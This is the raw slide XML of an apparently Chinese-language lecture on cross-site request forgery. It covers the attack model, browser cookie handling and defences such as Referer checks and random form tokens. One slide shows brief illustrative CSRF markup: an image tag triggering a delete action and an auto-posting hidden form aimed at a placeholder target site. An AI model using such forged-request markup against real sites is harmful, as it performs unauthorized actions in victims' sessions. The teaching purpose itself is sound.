            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>可以考虑使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>来判断请求来源。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>是站外的话就拒绝请求。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>为空，记得不要漏了空值。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在客户端伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>值？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用随机的不可猜测的表单</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>值来防止外站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>虽然在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的辅助下无效。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在一些重要的表单提交处可以考虑使用验证码或者密码确认方式进行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>这种方法很有效，但是用户体验就差了些。</a:t>
            </a:r>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2214563" y="2868613"/>
            <a:ext cx="4643437" cy="1000125"/>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2400"/>
              <a:t>一、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>模型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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4994" name="矩形 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1714500" y="4071938"/>
            <a:ext cx="5357813" cy="1754187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" b="1">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Q&amp;A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" b="1">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>　谢　谢！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="84996" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7143750" y="5143500"/>
            <a:ext cx="1625600" cy="1468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smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>模型</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="椭圆 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1500188" y="4214813"/>
            <a:ext cx="3071812" cy="1857375"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>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a:t>浏览器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="圆角矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2214563" y="4929188"/>
            <a:ext cx="1714500" cy="714375"/>
          </a:xfrm>
          <a:prstGeom prst="round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zh-CN" altLang="en-US"/>
              <a:t>被攻击者</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="2000250"/>
            <a:ext cx="3071813" cy="928688"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目标站点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5786438" y="4929188"/>
            <a:ext cx="1643062" cy="71437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a:t>恶意站点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="直接箭头连接符 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="1571625" y="3929063"/>
            <a:ext cx="200025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50184" name="TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1785938" y="3786188"/>
            <a:ext cx="2303462" cy="369887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>带上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>session/cookie</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50185" name="TextBox 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="928688" y="3201988"/>
            <a:ext cx="1570037" cy="369887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>可信任的请求</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="直接箭头连接符 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3943350" y="5527675"/>
            <a:ext cx="1857375" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:prstDash val="dashDot"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent5"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent5"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent5"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="直接箭头连接符 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4572000" y="5045075"/>
            <a:ext cx="121443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直接箭头连接符 13"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="3354388" y="3697288"/>
            <a:ext cx="1557337" cy="206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189" name="TextBox 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4214813" y="3214688"/>
            <a:ext cx="1570037" cy="369887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>可信任的请求</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="直接箭头连接符 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286500" y="1916113"/>
            <a:ext cx="714375" cy="158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50191" name="TextBox 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7000875" y="1701800"/>
            <a:ext cx="1338263" cy="369888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>正常的请求</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="直接箭头连接符 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286500" y="2343150"/>
            <a:ext cx="7143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193" name="TextBox 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7000875" y="2201863"/>
            <a:ext cx="1338263" cy="369887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>伪造的请求</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恶意站点</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>恶意站点 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目标站点，同域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>恶意站点 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>!= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目标站点，跨域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>也许包含的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击代码：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;img src=“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目标站点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/action=delete&amp;id=7”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;form action=“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目标站点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/post.php”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>	&lt;input type=“text” style=“…” name=“title” value=“csrf” /&gt;&lt;input …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>	&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;iframe src=“…”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>…&lt;param name="movie" value="post_as3.swf" /&gt; &lt;embed src="post_as3.swf“…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浏览器</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>内核浏览器：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>时，阻止带上本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>FF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等浏览器：没这种限制。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>内存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>session cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>FF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等浏览器不会阻止这类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>多标签浏览器：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>关闭标签页时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>session cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>没被清除。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>其他问题：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的浏览器窗口继承问题。</a:t>
            </a:r>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smtClean="0"/>
              <a:t>可信任的请求</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>正常的请求、伪造的请求。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>浏览器、目标站点没对它们进行区分。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>主要请求的类型：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
